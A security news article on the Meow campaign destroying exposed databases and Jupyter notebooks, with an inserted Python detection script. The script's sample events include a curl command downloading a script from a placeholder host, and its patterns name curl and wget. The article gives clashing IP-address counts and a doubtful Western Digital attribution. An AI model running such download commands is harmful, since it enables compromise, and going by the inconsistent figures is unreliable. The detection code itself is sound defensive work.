The new Meow attack targets the Jupyter Notebook

August 22, 2023

The new Meow attack is currently targeting poorly secured Jupyter notebooks. Researchers explained that this new automated Meow campaign is trying to compromise numerous publicly accessible databases on the internet.

Moreover, an investigation showed that the new campaign destroys these databases without a clear motive. The earliest signs of its activity were attacks on Elasticsearch and MongoDB instances, with no explanation from its operators. The attack then expanded to other database types and to exposed file systems on the web.


The Meow attack has reached Jupyter.

Based on reports, the operators of the Meow attack accessed a poorly configured Jupyter Notebook instance to execute their code. The attackers targeted about 1,283 distinct IP addresses while their infrastructure was still under investigation.

Moreover, the threat actors initiated a dash shell to harvest information about their victims. The data they are confirmed to have collected includes IDs, architecture, processor types, OS names and their releases.

Subsequently, the Meow actors downloaded a malicious script from a shared file server and ran it on the notebook after installing specific Python packages. Researchers also noted that the attackers used Python scripts to target databases, in keeping with the campaign's unusual way of operating.
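
The sequence described above (a shell started from the notebook, a host survey, package installation, then a script download) can be hunted for in process telemetry. The following Python detection is an added example, not code from the researchers or from the campaign; the event format, the sample events and the command patterns are constructed assumptions.

```python
import re

# Assumed command patterns for the stages the article describes (shell, host
# survey, package install, script download); the article lists no exact commands.
STAGES = {
    "shell": re.compile(r"^(/usr)?/bin/(sh|dash)\b"),
    "host_recon": re.compile(r"\b(uname|id|lscpu)\b"),
    "pkg_install": re.compile(r"\bpip3?\s+install\b"),
    "download": re.compile(r"\b(curl|wget)\b"),
}

# Constructed process-creation events (pid, ppid, cmdline); not real telemetry.
EVENTS = [
    (100, 1, "python3 -m ipykernel_launcher -f /tmp/kernel-a.json"),
    (101, 100, "/bin/sh -c uname -a; id"),
    (102, 101, "uname -a"),
    (103, 100, "/bin/sh -c pip install example-package"),
    (104, 100, "/bin/sh -c curl -s http://files.example.invalid/s.py -o /tmp/s.py"),
    (200, 1, "python3 -m ipykernel_launcher -f /tmp/kernel-b.json"),
    (201, 200, "/bin/sh -c pip install pandas"),
    (300, 1, "/bin/sh -c uname -a"),  # shell outside any notebook kernel
]


def kernel_ancestor(pid, parents, cmds):
    """Walk up the parent chain and return the Jupyter kernel pid, if any."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
        if "ipykernel_launcher" in cmds.get(pid, ""):
            return pid
    return None


def detect(events, min_stages=3):
    """Return {kernel_pid: stages} for kernels whose children hit min_stages."""
    parents = {pid: ppid for pid, ppid, _ in events}
    cmds = {pid: cmd for pid, _, cmd in events}
    hits = {}
    for pid, _, cmd in events:
        kernel = kernel_ancestor(pid, parents, cmds)
        if kernel is not None:
            for stage, pattern in STAGES.items():
                if pattern.search(cmd):
                    hits.setdefault(kernel, set()).add(stage)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_stages}


if __name__ == "__main__":
    print(detect(EVENTS))
```

Requiring several stages under the same kernel keeps an ordinary notebook that only runs a package install (kernel 200 in the sample) from raising an alert.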

Furthermore, the investigators found a script named ‘foo’ on the 1354 IP addresses targeting the MongoDB and Elasticsearch databases. Separate research spotted a script named ‘bar’ targeting Hadoop clusters.

Cybersecurity experts explained that these attacks could be catastrophic for everyone since they are automated attacks that could leverage known bugs to target unsecured databases.

The primary example of this is last year’s compromise of Western Digital, where the Meow attackers deleted petabytes of data. The campaign has obliterated the data from more than 4,000 databases, such as CouchDB, Redis, Jenkins, Cassandra, Hadoop, and Apache ZooKeeper.

The Meow attacks have reemerged after a year-long hiatus. Their operators are currently eyeing new targets. Therefore, organisations should regularly review their databases for security gaps.

Security teams at every organisation should adopt MFA on every device that stores confidential information to avoid falling prey to such actors.
